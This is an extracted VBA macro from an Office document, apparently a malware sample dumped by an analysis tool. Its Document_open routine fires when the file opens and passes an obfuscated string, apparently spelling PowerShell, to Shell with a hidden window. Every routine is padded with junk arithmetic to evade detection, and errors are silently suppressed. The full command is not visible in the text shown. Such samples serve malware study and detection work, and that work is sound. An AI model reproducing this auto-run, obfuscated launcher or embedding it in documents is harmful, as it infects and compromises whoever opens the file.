Filename     : ./macros/1a043a7d625e713712e57b23b4f07af0136ccc0a302f79957a6e77e7993e2e32
OLE stream   : Macros/VBA/nADZFJiR
VBA filename : nADZFJiR.cls
----------------------------------------
Attribute VB_Name = "nADZFJiR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QURDC()
On Error Resume Next
homTR = PESXW
zQciSj = 70406 / 50310
qijnlw = 68723 + 63397
GLVRPN = Atn(Nkhmz + Sin(fTEcO) - 28356 / 6289)
fUpRSl = MERaFa * CSng(23013 * Fix(54168)) * VNNzF + CSng(PiXCT + CLng(Djpzwz)) / (rIKswk * CSng(85648) - (10454 + Fix(uqPWE) - (46375 + CLng(kWhlY - Log(KtQRR) - 16701 + Int(cbIbk)))))
SLwLE = IjPUW
UXVcp = 95842 / 46637
aLdUvc = 2499 + 44942
jGDSF = Atn(watPuS + Sin(fswUu) - 80466 / 13455)
tMhzIu = mwdQnR * CSng(1668 * Fix(95268)) * COOpX + CSng(qjwXFw + CLng(XHjCU)) / (cFVIKW * CSng(34926) - (42496 + Fix(FCIKjJ) - (85543 + CLng(miazV - Log(Bkouc) - 46654 + Int(hkwNV)))))
kBWXJH = WLmFi
rjUQj = 1942 / 86304
aHVub = 53988 + 86132
tZJtT = Atn(MfVZj + Sin(jjffh) - 61219 / 2736)
lQCXOA = ihpQc * CSng(46117 * Fix(3898)) * DwHwTk + CSng(EZThi + CLng(BbANF)) / (nCJYzD * CSng(99918) - (49475 + Fix(ZEtBY) - (62087 + CLng(vUfZt - Log(LdEjW) - 97982 + Int(GpCXdO)))))
tzRBD = hsoZmE
nPCVB = 81555 / 56892
fIfzQ = 35090 + 95805
MmAwr = Atn(VnCKZ + Sin(MZwqHD) - 74219 / 13472)
JUrbzi = EsMSR * CSng(33319 * Fix(89604)) * DIwZK + CSng(UvaSE + CLng(XoQQi)) / (UbjiwK * CSng(48182) - (21569 + Fix(SZmQt) - (71865 + CLng(crTsnR - Log(ZRJuWp) - 31440 + Int(wjWwTm)))))
QURDC = IqANmZlVNk + Chr$(wuWuLu + 80 + wCnSB) + "OwerSH" + triZaKFA + EhMfihYGl + oESbIjbv + uEDutJMkNin + KYrLDkLlud
UOSNf = hrpUF
MVAzr = 3588 / 96130
GjzGEC = 99532 + 87973
oDEHu = Atn(qnhJPq + Sin(ftNhq) - 9350 / 86558)
sjfLZ = wdpMr * CSng(69395 * Fix(16146)) * HhIuO + CSng(SiACij + CLng(EPzndJ)) / (ElVrFL * CSng(87907) - (21735 + Fix(aMuwWp) - (47897 + CLng(IkvwOj - Log(dtqtOs) - 46427 + Int(adIWL)))))
IolNd = wIprA
ASEFtO = 34603 / 56306
pLjiXr = 85449 + 40591
isTMiN = Atn(RNDDB + Sin(iicTPU) - 1451 / 66015)
wRRSC = iEKCYs * CSng(39126 * Fix(25908)) * wcVLLW + CSng(VzGYBo + CLng(ZAJcG)) / (wBuds * CSng(97967) - (75917 + Fix(RhtVzm) - (64046 + CLng(VjJqDv - Log(Ldauh) - 71640 + Int(PPNpz)))))
End Function
Function iXMfslajjD(DjbckuznLR)
On Error Resume Next
rUHKn = SrOfj
AUGtOo = 3829 / 63020
aWssHY = 73788 + 93136
PEibJ = Atn(jXwVi + Sin(wSJHS) - 99488 / 6268)
UzNwrB = dTpzk * CSng(91959 * Fix(90866)) * DQAPX + CSng(fJhla + CLng(MMmqfj)) / (orYOl * CSng(22306) - (78138 + Fix(VBBNia) - (58542 + CLng(qXWZqo - Log(fNRFvQ) - 64524 + Int(UDmGWi)))))
vAtFaz = OczAH
QsuKsp = 41644 / 53987
pVkMtl = 63504 + 21461
wWOBJ = Atn(tjjmuo + Sin(wBiHa) - 85839 / 59110)
TGTmBv = oMVFzN * CSng(8129 * Fix(1723)) * MIKqQD + CSng(XtLwW + CLng(VCUVNX)) / (oYlNU * CSng(4367) - (3833 + Fix(azbRj) - (73376 + CLng(cWUfQm - Log(tqwcHr) - 35094 + Int(izjnln)))))
ABpoM = PNGccJcPr + Shell(qcTcNIpfq + DjbckuznLR + VtjYnLNb, 40671 - 40671)
zhlqiK = wcDzWX
LotozE = 70019 / 81551
pMDsm = 55493 + 34169
jSVmAB = Atn(hEOzbn + Sin(JjTHF) - 76932 / 30265)
MtJcf = TrRHXG * CSng(92029 * Fix(82487)) * uUXDQs + CSng(timBCh + CLng(zCsKM)) / (HkduTz * CSng(45491) - (21450 + Fix(cATwSI) - (46429 + CLng(ZBfPz - Log(pibmjR) - 8212 + Int(wjInKq)))))
End Function
Private Sub Document_open()
On Error Resume Next
YjlEP = oAYEdH
KAtwGF = 72330 / 93252
qQLnCo = 60558 + 9966
wsIWEO = Atn(NAVHI + Sin(DBFdP) - 24635 / 56300)
NqGht = EhwOj * CSng(3506 * Fix(88748)) * daWrI + CSng(kSWoDD + CLng(mQhCA)) / (fYzcdj * CSng(72957) - (47384 + Fix(AIniv) - (28390 + CLng(NjwWcS - Log(URdppR) - 32611 + Int(MjJPd)))))
XtLXV = iAZlj
cjuVPV = 57856 / 80449
HijON = 27193 + 13249
uMSqDQ = Atn(BjYhC + Sin(dRWwV) - 56217 / 70940)
tCzzn = OazIfR * CSng(92754 * Fix(93593)) * XznNQd + CSng(IzXtsK + CLng(srXpw)) / (ilFbuZ * CSng(49755) - (51603 + Fix(wqULHJ) - (29113 + CLng(AqcCt - Log(cuAEK) - 9676 + Int(IbzRw)))))
Application.Run CBPWwMXnV + "iXMfslajjD" + BoznzQ, GlrsLKwp + QURDC + WjioRw
wQzTKP = RKWuz
ITLMfJ = 79523 / 85985
vWTBEb = 99402 + 72223
LEWfTK = Atn(GzDnv + Sin(paiHI) - 28654 / 17726)
coLARf = UnujL * CSng(34322 * Fix(1592)) * riIEow + CSng(rElhJa + CLng(LuiEm)) / (FAXDhJ * CSng(60945) - (72665 + Fix(zndWfK) - (42176 + CLng(vwdjw - Log(PkWzA) - 55338 + Int(EHfFi)))))
uQzNdf = hOTzad
Tvfdq = 48542 / 79255
hiBpn = 50807 + 41808
Whzqa = Atn(jIqJR + Sin(qMzLW) - 6156 / 52839)
WqZwCl = SnBMO * CSng(32782 * Fix(9127)) * wqiLK + CSng(wsOtqm + CLng(KpVOWj)) / (ZYWHiM * CSng(97949) - (44681 + Fix(ilAcL) - (6990 + CLng(JPLKYz - Log(CMwjI) - 96139 + Int(zrkcza)))))
End Sub

